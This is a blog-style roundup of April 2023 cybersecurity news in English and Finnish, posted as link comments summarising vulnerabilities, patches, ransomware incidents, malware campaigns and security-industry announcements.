This posting is here to collect cyber security news in April 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in April 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
352 Comments
Tomi Engdahl says:
ChatGPT Creator OpenAI Ready to Pay Hackers for Security Flaws
OpenAI announced a bug bounty program that will pay hackers up to $20,000 for security vulnerabilities found in ChatGPT and other products and OpenAI corporate assets.
https://www.securityweek.com/chatgpt-creator-openai-ready-to-pay-hackers-via-new-bug-bounty-program/
Tomi Engdahl says:
https://www.securityweek.com/australian-finance-company-refuses-hackers-ransom-demand/
Tomi Engdahl says:
Microsoft Exchange Server 2013 Reaches End of Support
https://www.securityweek.com/microsoft-exchange-server-2013-reaches-end-of-support/
Microsoft Exchange Server 2013 has reached end of support on April 11, 2023, and will no longer receive security patches.
Tomi Engdahl says:
Yum Brands Discloses Data Breach Following Ransomware Attack
https://www.securityweek.com/yum-brands-discloses-data-breach-following-ransomware-attack/
KFC and Taco Bell parent company Yum Brands says personal information was compromised in a January 2023 ransomware attack.
Tomi Engdahl says:
https://www.securityweek.com/ics-patch-tuesday-siemens-schneider-electric-address-dozens-of-vulnerabilities/
Tomi Engdahl says:
https://www.securityweek.com/microsoft-azure-users-warned-of-potential-shared-key-authorization-abuse/
Tomi Engdahl says:
Application Security
Adobe Plugs Gaping Security Holes in Reader, Acrobat
https://www.securityweek.com/adobe-plugs-gaping-security-holes-in-reader-acrobat/
Adobe documents 56 security defects in multiple products, some serious enough to expose Windows and macOS users to code execution attacks.
Tomi Engdahl says:
Kyberuhkien torjuntaan koulutetaan lisää osaajia, mutta nyt ollaan jo myöhässä, sanoo professori
https://yle.fi/a/74-20026230
Venäjän aloittama sota Ukrainassa on kiristänyt myös kyberturvallisuustilannetta. Yliopistot vastaavat alan osaajapulaan aloittamalla uuden yhteistyön koulutuksessa.
Tomi Engdahl says:
Tässä ovat Suomen yleisimmät haittaohjelmat inhottava pankkitroijalainen iskee yhä useammin
https://www.tivi.fi/uutiset/tv/0223dd5d-e009-4ee3-8744-00b61a9f8541
Emotet-troijalaista levittävä haittaohjelmakampanja on noussut maailman toiseksi yleisimmäksi haittaohjelmaksi. Suomessa Emotet oli kolmanneksi käytetyin haittaohjelma maaliskuussa, selviää Check Point Researchin katsauksesta. Tietoturvayhtiön tutkijat huomasivat jo aiemmin rikollisten etsineen uusia keinoja haittaohjelmien levittämiseen, kun Microsoft ilmoitti estävänsä makrot sähköpostin tai internetin kautta välitetyistä Office-tiedostoista
Tomi Engdahl says:
Ruotsalainen vpn-firma joutui poliisin ratsaamaksi näin siinä kävi
https://www.tivi.fi/uutiset/tv/38a33aee-b150-47d3-a0b0-55b70ce5f2b7
Ruotsalainen vpn-palveluntarjoaja Mullvad VPN kertoo poliisin ratsanneen yhtiön tilat Göteborgissa tiistaina 18. huhtikuuta.
Tarkoituksenaan poliiseilla oli takavarikoida koneita, joissa olisi tietoja asiakkaista. Mullvadin mukaan asiakkaiden tietoja ei kuitenkaan vuotanut. Poliisi joutui poistumaan paikalta tyhjin käsin, kun Mullvadin juristit onnistuivat näille teroittamaan yhtiön toimintaperiaatteen ytimen. Mullvad haluaa pitää kiinni asiakkaidensa yksityisyydestä ja niinpä mitään tietoja asiakkaista ei kerätä. Ei ip-osoitteita, ei verkkoliikennettä, ei aikaleimoja, ei mitään
Tomi Engdahl says:
HSL kilpailutti tietoturvapalvelut vain hinnalla laatu varmistetaan henkilövalinnoilla https://www.tivi.fi/uutiset/tv/28448e26-1103-41a0-af3e-8708337e6b7c
Helsingin seudun liikenne sai helmikuun puolivälissä päätökseen kilpailutuksen 15 miljoonan euron puitesopimuksen tietoturvallisuuden ja tietosuojan asiantuntijapalveluiden hankinnasta. Tarjouksen jätti
19 yritystä, mukaan pääsi seitsemän. Kysymyksiä on herättänyt, että halvin hinta oli ainoa vertailuperuste. Eikö laadulla tosiaankaan ollut merkitystä? Pelkällä hinnalla kilpailuttaminen perustuu siihen, että kun kilpailutuksen kohteena ovat henkilöresurssit, laatu varmistetaan toimeksiantosopimuksen solmimisvaiheessa henkilövalinnoilla.
Tomi Engdahl says:
Exploit released for PaperCut flaw abused to hijack servers, patch now https://www.bleepingcomputer.com/news/security/exploit-released-for-papercut-flaw-abused-to-hijack-servers-patch-now/
Attackers are exploiting severe vulnerabilities in the widely-used PaperCut MF/NG print management software to install Atera remote management software to take over servers. The software’s developer claims it’s used by more than 100 million users from over 70,000 companies worldwide. The two security flaws (tracked as CVE-2023-27350 and CVE-2023-27351) allow remote attackers to bypass authentication and execute arbitrary code on compromised PaperCut servers with SYSTEM privileges in low-complexity attacks that don’t require user interaction
Tomi Engdahl says:
APC warns of critical unauthenticated RCE flaws in UPS software https://www.bleepingcomputer.com/news/security/apc-warns-of-critical-unauthenticated-rce-flaws-in-ups-software/
APC’s Easy UPS Online Monitoring Software is vulnerable to unauthenticated arbitrary remote code execution, allowing hackers to take over devices and, in a worst-case scenario, disabling its functionality altogether. APC (by Schneider Electric) is one of the most popular UPS brands. Its products are widely deployed on both the consumer and corporate markets, including governmental, healthcare, industrial, IT, and retail infrastructure
Tomi Engdahl says:
Vulnerability Spotlight: Vulnerabilities in IBM AIX could lead to command injection with elevated privileges https://blog.talosintelligence.com/vuln-spotlight-ibm-aix-privilege-escalation/
A Cisco security researcher recently discovered two vulnerabilities in the IBM AIX Unix platforms that could be exploited to inject commands and logs into targeted systems with elevated privileges. AIX is a more than 20-year-old set of operating systems for Unix that run on various IBM platforms
Tomi Engdahl says:
Yle: Näin Venäjä voi seurata maahan tulevien suomalaisten liikkeitä https://www.is.fi/digitoday/mobiili/art-2000009541247.html
Puhelimen yksilöivä imei-koodi mahdollistaa laajan seurannan.
VENÄJÄ on alkanut selvittää maahan tulevilta suomalaisilta puhelimien seuraamisen mahdollistavat imei-koodit. Ylen haastattelemat Venäjän-kävijät ovat kertoneet, että useat suomalaiset ovat joutuneet kuulusteluihin rajalla Suomen liityttyä Natoon.
Imei-koodi on 15-merkkinen puhelimen laitekoodi tai sarjanumero, joka säilyy muuttumattomana sim-kortin vaihdosta. Yksilöllinen laitekoodi mahdollistaa puhelimen seuraamisen Venäjän viranomaisille puhelimen ollessa kytkeytyneenä maan verkkoihin tai sen kytkemisen pois verkosta.
Tomi Engdahl says:
Rikolliset eivät ole enää luottokorttisi perässä: Tämä on vielä kiinnostavampaa – ja vaarallisempaa https://www.is.fi/digitoday/tietoturva/art-2000009470518.html
Sekä yritysten että yksittäisten ihmisten sähköpostitileille pääseminen mahdollistaa monenlaiset rötökset.
Tomi Engdahl says:
Yhä useampi verkkosivu kysyy mailiosoitettasi – tässä syy https://www.is.fi/digitoday/tietoturva/art-2000009359874.html
Sähköpostiosoitteesta on tullut entistä tärkeämpi keino ihmisten seuraamiseksi internetissä, The New York Times kertoo.
Tomi Engdahl says:
Tim Keary / VentureBeat:
Google announces Google Cloud Security AI Workbench, powered by the Sec-PaLM LLM, to rival tools like Microsoft’s GPT-4-based Security Copilot — Today in the Moscone Center, San Francisco, at RSA Conference 2023 (RSAC), Google Cloud announced Google Cloud Security AI Workbench …
Google releases security LLM at RSAC to rival Microsoft’s GPT-4-based copilot
https://venturebeat.com/security/google-releases-security-llm-at-rsac-to-rival-microsofts-gpt-4-based-copilot/
Today in the Moscone Center, San Francisco, at RSA Conference 2023 (RSAC), Google Cloud announced Google Cloud Security AI Workbench, a security platform powered by Sec-PaLM, a large language model (LLM) designed specifically for cybersecurity use cases.
Sec-PaLM modifies the organization’s existing PaLM model and processes Google’s proprietary threat intelligence data alongside Mandiant’s frontline intelligence to help identify and contain malicious activity, and coordinate response actions.
“Imagine a world where you know, as you’re generating your infrastructure, there’s an auto-generated security policy, security control, or security config that goes along with that,” Eric Doerr, VP of Engineering at Google Cloud, said in an interview with VentureBeat. “That’s one example that we’re working on that we think will be transformative in the world of security operations and security administration.”
One of the tools included as part of Google Cloud Security AI Workbench is VirusTotal Code Insight, released today in preview, which allows a user to import a script and analyze it for malicious behavior.
Another, Mandiant Breach Analytics for Chronicle, entering preview in summer 2023, uses Google Cloud and Mandiant threat intelligence to automatically notify users about breaches, while using Sec-PaLM to find, summarize and respond to threats discovered within the environment.
Kickstarting the defensive generative AI war
The announcement comes as more organizations are beginning to experiment with defensive use cases for generative AI, as part of a market that MarketsandMarkets estimates will reach a value of $51.8 billion by 2028.
One such vendor, SentinelOne, also unveiled a LLM security solution today at RSAC that uses algorithms like GPT-4 to accelerate human-led threat-hunting investigations and orchestrate automated responses.
Another key competitor experimenting with defensive generative AI use cases is Microsoft with Security Copilot, an AI assistant that combines GPT-4 with Microsoft’s proprietary data to process threat signals and create a written summary of potential breach activity.
Other vendors, like cloud security provider Orca Security and Kubernetes security company ARMO, have also begun experimenting with integrations that leverage generative AI to automate SOC operations.
Tomi Engdahl says:
38 Countries Take Part in NATO’s 2023 Locked Shields Cyber Exercise
https://www.securityweek.com/38-countries-take-part-in-natos-2023-locked-shields-cyber-exercise/
More than 3,000 participants from 38 countries took place in NATO’s 2023 Locked Shields cyber defense exercise.
Tomi Engdahl says:
Christian Vasquez / CyberScoop:
A group of operational technology cybersecurity vendors launches ETHOS, an open-source portal to share early warnings about threats to critical infrastructure
Industrial security vendors partner to share intelligence about critical infrastructure threats
https://cyberscoop.com/emerging-threat-open-sharing-industrial-cybersecurity/
The biggest companies working in industrial cybersecurity are building an early-warning platform called ETHOS to share threat intelligence.
Some of the largest operational technology cybersecurity vendors are building an open-sourced, opt-in threat intelligence sharing portal to provide early warnings about threats to critical infrastructure.
The platform called Emerging THreat Open Sharing, or ETHOS, is designed to break down information gaps that occur because organizations don’t have access to the same information about the latest hacks or vulnerabilities that could affect the entire energy sector, pipeline operators or other industrial sectors.
“The majority of the threat intelligence is contained within vendor silos,” said Andrea Carcano, co-founder and chief product officer at Nozomi Networks. “We’re not looking to be disruptive from that perspective. We’re looking to elevate the game. Your intelligence will always be limited by what you can see and it doesn’t matter how big your market share is.”
The overall lack of visibility into critical networks has been a longstanding concern in the U.S. Due to this issue, the Biden administration has led multiple “sprints” to increase visibility among various critical industries. The ETHOS effort that includes well-known cybersecurity firms that operate in critical infrastructure space such as 1898 & Co., Dragos, Claroty, Forescout, NetRise, Network Perception, Nozomi Networks, Schneider Electric, Tenable and Waterfall Security is one of the most significant industry initiatives to raise awareness across the entire sector.
The OT-centric, open-source platform for sharing anonymous early warning threat information
https://www.ethos-org.io/
Publicly launched on April 24, 2023, ETHOS is a cooperative development in the OT security industry, with the goal of sharing data to investigate early threat indicators and discover new and novel attacks.
Tomi Engdahl says:
https://www.securityweek.com/symantec-north-korean-3cx-hackers-also-hit-critical-infrastructure-orgs/
Tomi Engdahl says:
https://www.securityweek.com/huntress-most-papercut-installations-not-patched-against-already-exploited-security-flaw/
Tomi Engdahl says:
https://www.securityweek.com/north-korean-hackers-target-mac-users-with-new-rustbucket-malware/
Tomi Engdahl says:
SolarWinds Platform Update Patches High-Severity Vulnerabilities
https://www.securityweek.com/solarwinds-platform-update-patches-high-severity-vulnerabilities/
SolarWinds has patched two high-severity vulnerabilities that could lead to command execution and privilege escalation.
Two high-severity vulnerabilities patched recently in SolarWinds Platform could lead to command execution and privilege escalation.
The most severe of the two issues is CVE-2022-36963 (CVSS score of 8.8), which is described as a command injection bug in SolarWinds’ infrastructure monitoring and management solution.
The flaw, the company explains, can be exploited remotely to execute arbitrary commands. Successful exploitation of the vulnerability requires that the attacker is in the possession of credentials for a valid SolarWinds Platform admin account.
Tracked as CVE-2022-47505 (CVSS score of 7.8), the second high-severity issue is described as a local privilege escalation flaw.
“This vulnerability allows a local adversary with a valid system user account to escalate local privileges,” SolarWinds explains.
Both issues were reported by Trend Micro Zero Day Initiative researchers and both were addressed with the release of SolarWinds Platform version 2023.2.
Tomi Engdahl says:
ICS/OT
Critical Flaw in Inea ICS Product Exposes Industrial Organizations to Remote Attacks
https://www.securityweek.com/critical-flaw-in-inea-ics-product-exposes-industrial-organizations-to-remote-attacks/
Critical vulnerability found in Inea RTU can be exploited to remotely hack devices and cause disruption in industrial organizations.
A critical vulnerability found in a remote terminal unit (RTU) made by Slovenia-based industrial automation company Inea can expose industrial organizations to remote hacker attacks.
The existence of the vulnerability came to light last week, when the US Cybersecurity and Infrastructure Security Agency (CISA) published an advisory to inform organizations. The vendor has released a firmware update that patches the issue.
The security hole, tracked as CVE-2023-2131 with a CVSS score of 10, impacts Inea ME RTUs running firmware versions prior to 3.36. This OS command injection bug could allow remote code execution, CISA said.
The impacted product provides a data interface between remote field devices and the control center through a cellular network. According to CISA, the product is used worldwide in industries such as energy, transportation, and water and wastewater.
Tomi Engdahl says:
Google Cloud Platform Vulnerability Led to Stealthy Account Backdoors
https://www.securityweek.com/google-cloud-platform-vulnerability-led-to-stealthy-account-backdoors/
A vulnerability in Google Cloud Platform allowed attackers to modify and hide OAuth applications to create a stealthy backdoor to any Google account.
A vulnerability in Google Cloud Platform (GCP) could have allowed attackers to maliciously change an OAuth application and hide it to create a stealthy backdoor to any Google account.
Exploitation of the bug, referred to as GhostToken, could have allowed attackers to completely hide the malicious application from the Google user and leverage it to retrieve account tokens to access the victim’s data.
The issue was related to the deletion of OAuth clients, which essentially are GCP projects, app-to-app security firm Astrix, which identified the flaw in June last year, explains.
When a GCP project is deleted – either by the owner or anyone that has the necessary management permissions – the project enters a ‘pending deletion’ state for 30 days, allowing the developer to restore it if necessary.
However, when they are deleted, they are no longer displayed in the Google account application management page, even if they continue to have access to the account.
GhostToken – Exploiting GCP application infrastructure to create invisible, unremovable trojan app on Google accounts
https://astrix.security/ghosttoken-exploiting-gcp-application-infrastructure-to-create-invisible-unremovable-trojan-app-on-google-accounts/
Tomi Engdahl says:
Kubernetes RBAC Exploited in Large-Scale Campaign for Cryptocurrency Mining
https://thehackernews.com/2023/04/kubernetes-rbac-exploited-in-large.html
A large-scale attack campaign discovered in the wild has been exploiting Kubernetes (K8s) Role-Based Access Control (RBAC) to create backdoors and run cryptocurrency miners.
“The attackers also deployed DaemonSets to take over and hijack resources of the K8s clusters they attack,” cloud security firm Aqua said in a report shared with The Hacker News. The Israeli company, which dubbed the attack RBAC Buster, said it found 60 exposed K8s clusters that have been exploited by the threat actor behind this campaign.
The attack chain commenced with the attacker gaining initial access via a misconfigured API server, followed by checking for evidence of competing miner malware on the compromised server, and then using RBAC to set up persistence.
Tomi Engdahl says:
https://arstechnica.com/information-technology/2023/04/exploit-released-for-9-8-severity-papercut-flaw-already-under-attack/
Tomi Engdahl says:
Husin työntekijää epäillään vakavasta tietoturvaloukkauksesta kohdistunut satojen ihmisten tietoihin https://www.is.fi/digitoday/tietoturva/art-2000009542489.html
HUSIN työntekijää epäillään vakavasta tietoturvaloukkauksesta, Hus kertoo. Luvaton katselu on kohdistunut satojen ihmisten tietoihin.
Työntekijän työsuhde on purettu, ja Hus on tehnyt asiasta tutkintapyynnön poliisille. Tietoturvaloukkaus ilmeni viranomaisyhteistyönä toteutetussa selvityksessä. Selvityksen mukaan asiakaslaskutusta hoitanut reskontrahoitaja oli tehnyt sekä väestötietojärjestelmässä että Husin potilastietojärjestelmissä perusteettomia hakuja vuosien ajan
Tomi Engdahl says:
Intel CPUs vulnerable to new transient execution side-channel attack https://www.bleepingcomputer.com/news/security/intel-cpus-vulnerable-to-new-transient-execution-side-channel-attack/
A new side-channel attack impacting multiple generations of Intel CPUs has been discovered, allowing data to be leaked through the EFLAGS register. Instead of relying on the cache system like many other side-channel attacks, this new attack leverages a flaw in transient execution that makes it possible to extract secret data from user memory space through timing analysis. The attack works as a side channel to Meltdown, a critical security flaw discovered in 2018, impacting many x86-based microprocessors. Meltdown has been largely mitigated through software patches, microcode updates, and hardware redesigns; however, no solution has addressed the problem 100%, and the latest attack method might work even in fully patched systems depending on hardware, software, and patch configurations
Tomi Engdahl says:
New SLP bug can lead to massive 2,200x DDoS amplification attacks https://www.bleepingcomputer.com/news/security/new-slp-bug-can-lead-to-massive-2-200x-ddos-amplification-attacks/
A new reflective Denial-of-Service (DoS) amplification vulnerability in the Service Location Protocol (SLP) allows threat actors to launch massive denial-of-service attacks with 2,200X amplification. This flaw, tracked as CVE-2023-29552, was discovered by researchers at BitSight and Curesec, who say that over 2,000 organizations are using devices that expose roughly 54,000 exploitable SLP instances for use in DDoS amplification attacks. Vulnerable services include VMWare ESXi Hypervisors, Konica Minolta printers, IBM Integrated Management Modules, and Planex Routers deployed by unsuspecting organizations worldwide
Tomi Engdahl says:
iOS Lockdown Mode effective against NSO zero-click exploit https://www.malwarebytes.com/blog/news/2023/04/ios-lockdown-mode-effective-against-nso-zero-click-exploit
Apples Lockdown Mode feature alerted a victim to one of the latest NSO exploits, according to a report by Citizen Lab. This is a huge deal since it shows how useful Lockdown Mode can be, even against exploits developed by one of the worlds most notorious commercial spyware producers
Tomi Engdahl says:
TP-Link Archer WiFi router flaw exploited by Mirai malware https://www.bleepingcomputer.com/news/security/tp-link-archer-wifi-router-flaw-exploited-by-mirai-malware/
The Mirai malware botnet is actively exploiting a TP-Link Archer A21
(AX1800) WiFi router vulnerability tracked as CVE-2023-1389 to incorporate devices into DDoS (distributed denial of service) swarms.
Researchers first abused the flaw during the Pwn2Own Toronto hacking event in December 2022, where two separate hacking teams breached the device using different pathways (LAN and WAN interface access). The flaw was disclosed to TP-Link in January 2023, with TP-Link releasing a fix last month in a new firmware update. The exploitation attempts in the wild was detected by the Zero Day Initiative (ZDI) starting last week, initially focusing on Eastern Europe and spreading worldwide
Tomi Engdahl says:
Google Audit Finds Vulnerabilities in Intel TDX
https://www.securityweek.com/google-audit-finds-vulnerabilities-in-intel-tdx/
Over a nine-month audit, Google researchers identified ten security defects in Intel TDX, including nine vulnerabilities addressed with TDX code changes.
Google this week published the results of a nine-month audit of Intel Trust Domain Extensions (TDX), which resulted in the discovery of ten security defects.
Providing hardware isolated virtual machines, TDX has been added to some Intel Xeon Scalable CPUs to support confidential computing by isolating sensitive resources from the hosting environment.
Focused on identifying any vulnerabilities in Intel’s technology before it entered production, the security review was performed by a team of Google Cloud Security and Project Zero researchers, working together with Intel engineers.
The team identified 81 potential attack vectors and ten confirmed vulnerabilities. Nine of the defects were addressed in the TDX code, while the tenth issue required changes to the guide for writing a BIOS to support TDX. Intel also made five defense-in-depth changes.
The vulnerabilities, Google says, could lead to arbitrary code execution, cryptographic weaknesses, denial-of-service conditions, and weaknesses in debug or deployment facilities.
No CVE identifiers were issued for the discovered bugs, but Intel did assess their severity and assigned a CVSS score of 9.3 to an incorrect handling of interrupts when the Authenticated Code Module (ACM) transitioned from the privileged execution context to an untrusted context.
The flaw could be exploited to execute arbitrary code within the privileged ACM execution mode, compromising both TDX integrity and the security of any deployed virtual machines.
“The review met its expected goals and was able to ensure significant security issues were resolved before the final release of Intel TDX. Overall, the review provided Google with a better understanding of how the TDX feature functions which can be used to guide deployment,” Google says.
“Where possible the review performed variant analysis of any discovered issues to determine if the same pattern could be identified in other areas of the code base. All confirmed issues were mitigated before the production release of the 4th gen Intel Xeon Scalable processors,” Google explains in a detailed report (PDF).
https://services.google.com/fh/files/misc/intel_tdx_-_full_report_041423.pdf
Tomi Engdahl says:
ICS/OT
Critical Flaw in Inea ICS Product Exposes Industrial Organizations to Remote Attacks
https://www.securityweek.com/critical-flaw-in-inea-ics-product-exposes-industrial-organizations-to-remote-attacks/
Critical vulnerability found in Inea RTU can be exploited to remotely hack devices and cause disruption in industrial organizations.
Tomi Engdahl says:
Artificial Intelligence
Insider Q&A: OpenAI CTO Mira Murati on Shepherding ChatGPT
https://www.securityweek.com/insider-qa-openai-cto-mira-murati-on-shepherding-chatgpt/
OpenAI CTO Mira Murati discusses AI safeguards and the company’s vision for the futuristic concept of artificial general intelligence, known as AGI.
Tomi Engdahl says:
EU ratkoo nyt mahdotonta yhtälöä lopputulos vaikuttaa kaikkien kansalaisten puhelimiin https://www.is.fi/digitoday/tietoturva/art-2000009543795.html
VAHVOJA tunteita herättävän ja mahdollisesti internetin toiminnan luonnetta EU:ssa muuttavan, chat control -nimellä tunnetun lakialoitteen käsittely ottaa tänään EU:ssa askeleen eteenpäin, kun EU-parlamentti antaa vastauksensa lakiehdotukseen. Lain tarkoitus on edistää lasten seksuaalisen hyväksikäytön ja terrorismin torjumista internetissä. Samaan aikaan sen pelätään purkavan pikaviestimien sekä muiden nettiviestimien salauksen ja antavan viranomaisille ja mahdolliselle automatisoidulle massavalvonnalle yleisavaimen nettiliikenteeseen
Tomi Engdahl says:
Thousands of Apache Superset servers exposed to RCE attacks https://www.bleepingcomputer.com/news/security/thousands-of-apache-superset-servers-exposed-to-rce-attacks/
Apache Superset is vulnerable to authentication bypass and remote code execution at default configurations, allowing attackers to potentially access and modify data, harvest credentials, and execute commands.
Apache Superset is an open-source data visualization and exploration tool initially developed for Airbnb before it became a top-level project at the Apache Software Foundation in 2021. According to a new report by Horizon3, Apache Superset used a default Flask Secret Key to sign authentication session cookies. As a result, attackers can use this default key to forge session cookies that allow them to log in with administrator privileges to servers that did not change the key
Tomi Engdahl says:
Western Digital hit by hackers
https://www.pandasecurity.com/en/mediacenter/security/western-digital/
Last month Western Digital (WD) was hit by a hacker attack. TechCrunch first reported the news on Thursday last week after the cybercriminals contacted the popular blog. WD is known as a Silicon Valley-based American computer drive manufacturer and data storage company. The hackers claim to have more than 10TB of sensitive data stolen from the storage company and are demanding more than $10 million in ransom. The hackers shared a sample of the stolen information with the tech bloggers, who verified its legitimacy
Tomi Engdahl says:
Charming Kitten’s New BellaCiao Malware Discovered in Multi-Country Attacks https://thehackernews.com/2023/04/charming-kittens-new-bellaciao-malware.html
The prolific Iranian nation-state group known as Charming Kitten is actively targeting multiple victims in the U.S., Europe, the Middle East and India with a novel malware dubbed BellaCiao, adding to its ever-expanding list of custom tools. Discovered by Bitdefender Labs, BellaCiao is a “personalized dropper” that’s capable of delivering other malware payloads onto a victim machine based on commands received from an actor-controlled server. “Each sample collected was tied up to a specific victim and included hard-coded information such as company name, specially crafted subdomains, or associated public IP address,” the Romanian cybersecurity firm said in a report shared with The Hacker News
Tomi Engdahl says:
Google disrupts the CryptBot info-stealing malware operation https://www.bleepingcomputer.com/news/security/google-disrupts-the-cryptbot-info-stealing-malware-operation/
Google is taking down malware infrastructure linked to the Cryptbot info stealer after suing those using it to infect Google Chrome users and steal their data. The lawsuit targets Cryptbot’s infrastructure and distribution network, whose disruption would help decrease the number of victims having their sensitive information stolen using the malware. “Yesterday, a federal judge in the Southern District of New York unsealed our civil action against the malware distributors of Cryptbot, which we estimate infected approximately 670,000 computers this past year and targeted users of Google Chrome to steal their data,” the Head of Litigation Advance Mike Trinh and Threat Analysis Group’s Pierre-Marc Bureau said
Tomi Engdahl says:
GuLoader returns with a rotten shipment
https://www.malwarebytes.com/blog/news/2023/04/guloader-returns-with-a-rotten-shipment
GuLoader, a perennial favourite of email-based malware campaigns since 2019, has been seen in the wild once again. GuLoader is a downloader with a chequered history, dating back to somewhere around 2011 in various forms. Two years ago it was one of our most seen malspam attachments. GuLoader is typically used to load in the payload for the campaign in question. It often arrives in a ZIP file, and once opened and the file inside is executed the malicious activity begins. It may attempt to download data stealers, trojans, generic forms of malwarewhatever is required. On top of this, GuLoader is designed to evade network detection and sneak past sandbox technology. For example, it may recognise being loaded up inside a virtual testing machine and refuse to load
Tomi Engdahl says:
Black Basta ransomware attacks Yellow Pages Canada https://www.malwarebytes.com/blog/news/2023/04/black-basta-ransomware-attacks-yellow-pages-canada
The Canadian Yellow Pages Group has confirmed it recently became victim of a cyberattack. The Black Basta ransomware group has claimed responsibility for this attack by posting about Yellow Pages on the Basta News leak site. When such a post shows up, it usually means that negotiations with the victim have stopped and that the ransomware group is getting ready to sell the data it managed to get its hands on during the attack. Based on the most recent leaked information and an outage of the Yellow Pages website Canada 411 at the beginning of April, it is likely the attack occurred between March 15 and April 7.
Attackers using Black Basta have been known to be active on a victim’s network for two to three days before running their ransomware
Tomi Engdahl says:
FIN7 Hackers Caught Exploiting Recent Veeam Vulnerability
https://www.securityweek.com/fin7-hackers-caught-exploiting-recent-veeam-vulnerability/
Russian cybercrime group FIN7 has been observed exploiting a Veeam Backup & Replication vulnerability patched in March 2023.
Russian cybercrime group FIN7 has been observed exploiting unpatched Veeam Backup & Replication instances in recent attacks, cybersecurity company WithSecure reports.
Around since at least 2015 and also referred to as Anunak, and Carbanak, FIN7 is a financially motivated group mainly focused on credit card information theft. Security researchers believe there are numerous sub-groups operating under the FIN7 umbrella.
Over the past years, some of the threat actors overlapping with FIN7 operations were seen transitioning to ransomware, including REvil, DarkSide, BlackMatter, Alphv, and Black Basta.
At the end of March 2023, WithSecure caught FIN7 attacks that exploited internet-facing servers running Veeam Backup & Replication software to execute payloads on the compromised environment.
The cybersecurity firm observed a Veeam Backup process executing a shell command to download and execute a PowerShell script that turned out to be the Powertrash in-memory dropper known to be used by FIN7.
Tomi Engdahl says:
VMware Releases Critical Patches for Workstation and Fusion Software
https://thehackernews.com/2023/04/vmware-releases-critical-patches-for.html
VMware has released updates to resolve multiple security flaws impacting its Workstation and Fusion software, the most critical of which could allow a local attacker to achieve code execution.
The vulnerability, tracked as CVE-2023-20869 (CVSS score: 9.3), is described as a stack-based buffer-overflow vulnerability that resides in the functionality for sharing host Bluetooth devices with the virtual machine.
“A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine’s VMX process running on the host,” the company said.
Also patched by VMware is an out-of-bounds read vulnerability affecting the same feature (CVE-2023-20870, CVSS score: 7.1), that could be abused by a local adversary with admin privileges to read sensitive information contained in hypervisor memory from a virtual machine.
Both vulnerabilities were demonstrated by researchers from STAR Labs on the third day of the Pwn2Own hacking contest held in Vancouver last month, earning them an $80,000 reward.
VMware has also resolved two additional shortcomings, which include a local privilege escalation flaw (CVE-2023-20871, CVSS score: 7.3) in Fusion and an out-of-bounds read/write vulnerability in SCSI CD/DVD device emulation (CVE-2023-20872, CVSS score: 7.7).
https://www.vmware.com/security/advisories/VMSA-2023-0008.html
Impacted Products
VMware Workstation Pro / Player (Workstation)
VMware Fusion
Tomi Engdahl says:
Lookout sells its consumer cybersecurity business to F-Secure for $223M and goes all-in on the enterprise
https://techcrunch.com/2023/04/26/lookout-sells-its-consumer-cybersecurity-business-to-f-secure-and-goes-all-in-on-the-enterprise/?guccounter=1&guce_referrer=aHR0cHM6Ly93d3cudGVjaG1lbWUuY29tLw&guce_referrer_sig=AQAAAIar-RBA7QScU1_mR8XkM9TNNWf2oRZby4CKNuMrD4J24XaP8hpOxmLdauwuz9uoFrZrbEACA-gz9_Vlq9ajQP6DFrcYVBAIYiCw4QYyFstu7vyqZldImdctesUKRGhiZT7RdHGHhtLFsah3ymZDCrXbpRg34w35cbrn0uxPEt0R
Lookout’s long-running transition to becoming an enterprise security company is all but complete, revealing today that it’s selling its consumer mobile security business to Finland’s F-Secure in a deal valued at around $223 million.
Founded out of San Francisco in 2009, Lookout originally started as a consumer-focused smartphone security and data backup business, garnering millions of users and hundreds of millions in funding from esteemed investors, including Andreessen Horowitz, Accel, Greylock, Morgan Stanley, Deutsche Telekom and Jeff Bezos.
Tomi Engdahl says:
Tom Warren / The Verge:
Some users say Microsoft Edge sends URLs of visited pages to the Bing API website; a developer says Edge’s creator follow option, on by default, may be to blame — Microsoft’s Edge browser appears to be sending URLs you visit to its Bing API website. … Microsoft tells The Verge it’s investigating the reports.
Microsoft Edge is leaking the sites you visit to Bing
/ It’s probably a good idea to disable Edge’s follow creator feature until this privacy issue is fixed.
https://www.theverge.com/2023/4/25/23697532/microsoft-edge-browser-url-leak-bing-privacy
Tomi Engdahl says:
Kiinalainen hakkeriryhmä hyökkää nyt Linuxiin
https://etn.fi/index.php/13-news/14896-kiinalainen-hakkeriryhmae-hyoekkaeae-nyt-linuxiin
Tietoturvayhtiö Palo Alto Networksin turvallisuusyksikkö Unit 42:n julkaiseman tiedon mukaan kiinalainen hakkeriryhmä Alloy Taurus hyödyntää PingPull-haittaohjelman uutta versiota hyökkäyksissään. Sen uusi Linux-versio näyttää onnistuvan välttämään tehokkaasti suojausohjelmia.
PingPull-haittaohjelman ensimmäiset näytteet löytyvät syyskuulta 2021. Tuolloin löydetty haittaohjelma on sittemmin yhdistetty etenkin Alloy Taurus -nimen saaneeseen kiinalaiseen hakkeriryhmään. Ryhmä on identifioitu myös muilla nimillä, kuten Gallium ja Softcell. Ryhmän toiminnasta on jälkiä jo vuodesta 2012 alkaen.
Ryhmä on tullut erityisen tunnetuksi kybervakoilutoimista, jonka kohteena ovat olleet tietoliikenneyritykset Aasiassa, Euroopassa ja Afrikassa.
PingPull-haittaohjelman uusi Linux-versio on onnistunut tehokkaasti välttämään suojausohjelmien havainnointitoimet. Esimerkiksi VirusTotalin tietojen mukaan 62 eri virustorjuntaohjelmasta yksikään ei kyennyt tunnistamaan PingPullia haittaohjelmaksi.
Chinese Alloy Taurus Updates PingPull Malware
https://unit42.paloaltonetworks.com/alloy-taurus/
Unit 42 researchers recently identified a new variant of PingPull malware used by Alloy Taurus actors designed to target Linux systems. While following the infrastructure leveraged by the actor for this PingPull variant, we also identified their use of another backdoor we track as Sword2033.
The first samples of PingPull malware date back to September 2021. Monitoring its use across several campaigns, in June 2022 Unit 42 published research outlining the functionality of PingPull and attributed the use of the tool to Alloy Taurus.
Tomi Engdahl says:
RSA Conference 2023 – Announcements Summary (Day 1)
Hundreds of companies are showcasing their products and services this week at the 2023 edition of the RSA Conference in San Francisco.
https://www.securityweek.com/rsa-conference-2023-announcements-summary-day-1/
Akamai launches Brand Protector
Web security company Akamai has launched Brand Protector, a new solution designed to help organizations detect and disrupt phishing websites, fake online stores, and brand impersonation.
AWS announces new Amazon GuardDuty capabilities
